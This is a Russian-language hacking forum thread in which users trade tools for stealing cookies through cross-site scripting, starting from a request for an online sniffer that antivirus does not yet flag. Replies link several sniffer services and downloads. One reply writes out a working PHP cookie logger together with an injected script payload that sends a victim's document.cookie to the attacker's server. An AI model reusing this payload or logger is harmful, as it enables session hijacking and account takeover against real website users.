Подскажите онлайн сниффер для хсс Всегда использовал hacker-pro.net/sniffer но это каспер уже палить!
Чего стоит своего написать или найти в интернете исходники и скинуть хостинг? http://kanick.ru/sniffer/ При написание снифа участвовал админ Античата. по словам автора.
http://forum.k0d.cc/showthread.php?t=4654 http://soledar.org.ua/s/log.php http://www.kodsweb.ru/online/snif/index.php
ничего же сложного в этом нет, две минуты делов и: PHP: <?php $logfile = fopen('logs.txt', 'a+'); if(substr($_SERVER['QUERY_STRING'],0,6) === 'cookie' && strrpos($_SERVER['QUERY_STRING'],'~')) { fwrite($logfile,date("m.d.Y, H:i:s").' Cookie: '.end(explode('~',$_SERVER['QUERY_STRING']))."\r\n\r\n"); } fclose($logfile); ?> Вызывается так: Code: http://атакуемыйсайт/bug?xss=<script>img=new Image();img.src="http://вашсервер/sniff.php?cookie~"+document.cookie;</script>
ССЫЛКА Тут снифер Sin3v прост в оброщение,сорцы+ видео. там ссылка мертвая нагугли,я ухожу просто. ====== http://files.gw.kz/?486183 Что не понятно спрашивай,там нужен валидный номер аськи для работы.